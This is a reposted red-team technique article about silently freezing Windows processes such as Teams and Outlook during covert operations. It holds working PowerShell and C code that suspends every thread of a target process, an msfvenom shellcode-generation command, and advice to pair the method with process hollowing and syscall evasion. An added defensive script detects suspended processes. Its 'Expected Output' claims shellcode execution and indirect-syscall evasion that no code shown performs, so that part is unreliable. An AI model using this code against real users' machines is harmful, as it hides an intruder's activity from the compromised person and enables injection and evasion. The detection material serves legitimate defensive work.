Silently Freezing Windows Processes for Covert Red Team Operations


Lately, I’ve been exploring ways to silently freeze Windows processes—specifically to enable process hijacking during covert red team operations. The idea came from a previous engagement where direct access to high-value targets was achieved through Microsoft Teams. The challenge? The compromised user had Teams running continuously, making internal social engineering risky due to real-time visibility.

This led to researching methods to discreetly pause processes, making them appear functional while rendering them inert. The solution involves manipulating process thread properties, and the technique has proven effective against applications like Teams, Slack, and Outlook.

Blog Post: https://lnkd.in/gQtUuNeU
GitHub: https://lnkd.in/gTww9zWH

You Should Know:

1. Suspending a Process via Command Line

Use PowerShell or `NtSuspendProcess` (via NtDll) to freeze a process silently:

# PowerShell: suspend every thread of a process by name (OpenThread + SuspendThread from kernel32 via P/Invoke)
Add-Type -Namespace Win32 -Name Threads -MemberDefinition @"
[DllImport("kernel32.dll")] public static extern IntPtr OpenThread(uint dwDesiredAccess, bool bInheritHandle, uint dwThreadId);
[DllImport("kernel32.dll")] public static extern uint SuspendThread(IntPtr hThread);
[DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr hObject);
"@
$process = Get-Process -Name "Teams"
$process.Threads | ForEach-Object {
    $hThread = [Win32.Threads]::OpenThread(0x0002, $false, $_.Id)   # 0x0002 = THREAD_SUSPEND_RESUME; SuspendThread needs a handle, not a thread ID
    if ($hThread -ne [IntPtr]::Zero) {
        [void][Win32.Threads]::SuspendThread($hThread)              # returns the thread's previous suspend count
        [void][Win32.Threads]::CloseHandle($hThread)
    }
}

2. Using NtSuspendProcess in C (BOF-Friendly)

For Beacon Object Files (BOF), call the native API from ntdll (note that the snippet below resolves `NtSuspendProcess` with GetProcAddress rather than issuing a true direct syscall):

#include <windows.h>
#include <winternl.h>   // NTSTATUS
#include <stdio.h>

// NtSuspendProcess is undocumented and has no import library, so resolve it from ntdll at runtime
typedef NTSTATUS (NTAPI *PNtSuspendProcess)(HANDLE hProcess);

void SuspendProcess(DWORD pid) {
    // PROCESS_SUSPEND_RESUME is the only access right this call needs
    HANDLE hProcess = OpenProcess(PROCESS_SUSPEND_RESUME, FALSE, pid);
    if (hProcess == NULL) {
        printf("OpenProcess(%lu) failed: %lu\n", pid, GetLastError());
        return;
    }
    PNtSuspendProcess NtSuspendProcess = (PNtSuspendProcess)GetProcAddress(
        GetModuleHandleA("ntdll.dll"), "NtSuspendProcess");
    if (NtSuspendProcess != NULL) {
        NTSTATUS status = NtSuspendProcess(hProcess);   // STATUS_SUCCESS (0) when the process is frozen
        printf("NtSuspendProcess -> 0x%08lX\n", (unsigned long)status);
    }
    CloseHandle(hProcess);
}

3. Resuming a Frozen Process

Reverse the action using `NtResumeProcess`:

typedef NTSTATUS (NTAPI *PNtResumeProcess)(HANDLE hProcess);   // same signature as NtSuspendProcess
PNtResumeProcess NtResumeProcess = (PNtResumeProcess)GetProcAddress(
    GetModuleHandleA("ntdll.dll"), "NtResumeProcess");
if (NtResumeProcess != NULL)
    NtResumeProcess(hProcess);   // hProcess opened with PROCESS_SUSPEND_RESUME, as above

4. Process Injection via Thread Hijacking

After freezing, the post injects shellcode into the process; only the payload-generation step is shown here:

# Build the Windows x64 payload with msfvenom on a Linux host (the payload targets Windows; this is not a Linux equivalent of the technique)
msfvenom -p windows/x64/exec CMD="calc.exe" -f raw > shellcode.bin

5. Detecting Suspended Processes

Check for suspended threads via Task Manager (Details tab) or PowerShell. A bare `ThreadState -eq "Wait"` test matches almost every process, because idle threads normally sit in the Wait state; the distinguishing signal is a `WaitReason` of `Suspended`:

# Processes with at least one thread parked by SuspendThread/NtSuspendProcess (ThreadState must be checked first: WaitReason throws for non-waiting threads)
Get-Process | Where-Object { $_.Threads | Where-Object { $_.ThreadState -eq 'Wait' -and $_.WaitReason -eq 'Suspended' } }
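As an added defender-side example (not code from the original post or its GitHub project), the function below goes a step further than the one-liner: it counts suspended threads per process and reports only processes where the suspended fraction meets a threshold, so a fully frozen Teams or Outlook stands out from a process that merely has one paused worker thread. The function name `Get-SuspendedProcessReport`, the `-Threshold` parameter and the `WindowsApps` path heuristic for packaged apps are this example's own assumptions.

```powershell
# Added example, not from the original post: report processes that look frozen.
# Idle threads normally sit in ThreadState 'Wait' for reasons such as UserRequest,
# so the signal for a frozen process is every thread waiting with WaitReason 'Suspended'.
function Get-SuspendedProcessReport {
    param(
        # Minimum fraction of a process's threads that must be suspended to report it
        # (1.0 = fully frozen; lower it to catch partially suspended processes)
        [double]$Threshold = 1.0
    )
    foreach ($proc in Get-Process) {
        # Threads can be unreadable (protected process) or the process may already have exited
        try { $threads = @($proc.Threads) } catch { continue }
        if ($threads.Count -eq 0) { continue }

        # WaitReason throws unless the thread is in the Wait state, so test ThreadState first
        $suspended = @($threads | Where-Object {
            $_.ThreadState -eq 'Wait' -and $_.WaitReason -eq 'Suspended'
        })

        if (($suspended.Count / $threads.Count) -ge $Threshold) {
            # Path is unavailable for some system processes; treat that as "not packaged"
            $path = $null
            try { $path = $proc.Path } catch { }

            [pscustomobject]@{
                Id               = $proc.Id
                Name             = $proc.ProcessName
                Threads          = $threads.Count
                SuspendedThreads = $suspended.Count
                # Packaged (UWP) apps are legitimately suspended by Process Lifetime Management
                # (heuristic: installed under WindowsApps); a classic desktop app in this
                # state is the interesting case
                Packaged         = [bool]($path -like '*\WindowsApps\*')
            }
        }
    }
}

# Usage: list fully frozen, non-packaged processes; add -Threshold 0.5 to include partially suspended ones
Get-SuspendedProcessReport | Where-Object { -not $_.Packaged } | Format-Table -AutoSize
```

The `Packaged` column exists because Windows itself suspends Store/UWP apps in the background, so a thread-state check alone produces expected hits on a normal desktop; filtering those out leaves classic Win32 applications such as Teams, Slack or Outlook, which have no legitimate reason to sit with every thread suspended. Run the report on a schedule (or from an EDR's script-execution hook) and compare against a baseline rather than alerting on a single snapshot, since a debugger attached to a process will also leave its threads suspended.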

What Undercode Say:

Silently freezing processes is a powerful technique for red teams, enabling stealthy persistence and social engineering bypasses. However, defenders can detect anomalies via thread state monitoring or EDR solutions inspecting `NtSuspendProcess` calls. Always test in controlled environments and combine with other evasion tactics like process hollowing or direct syscalls.

Expected Output:

  • Suspended target process (e.g., Teams) with no visible disruption.
  • Successful shellcode execution in the frozen process space.
  • Defensive evasion via indirect syscalls and minimal API tracing.

References:

Reported By: Ibai Castells – Hackers Feeds
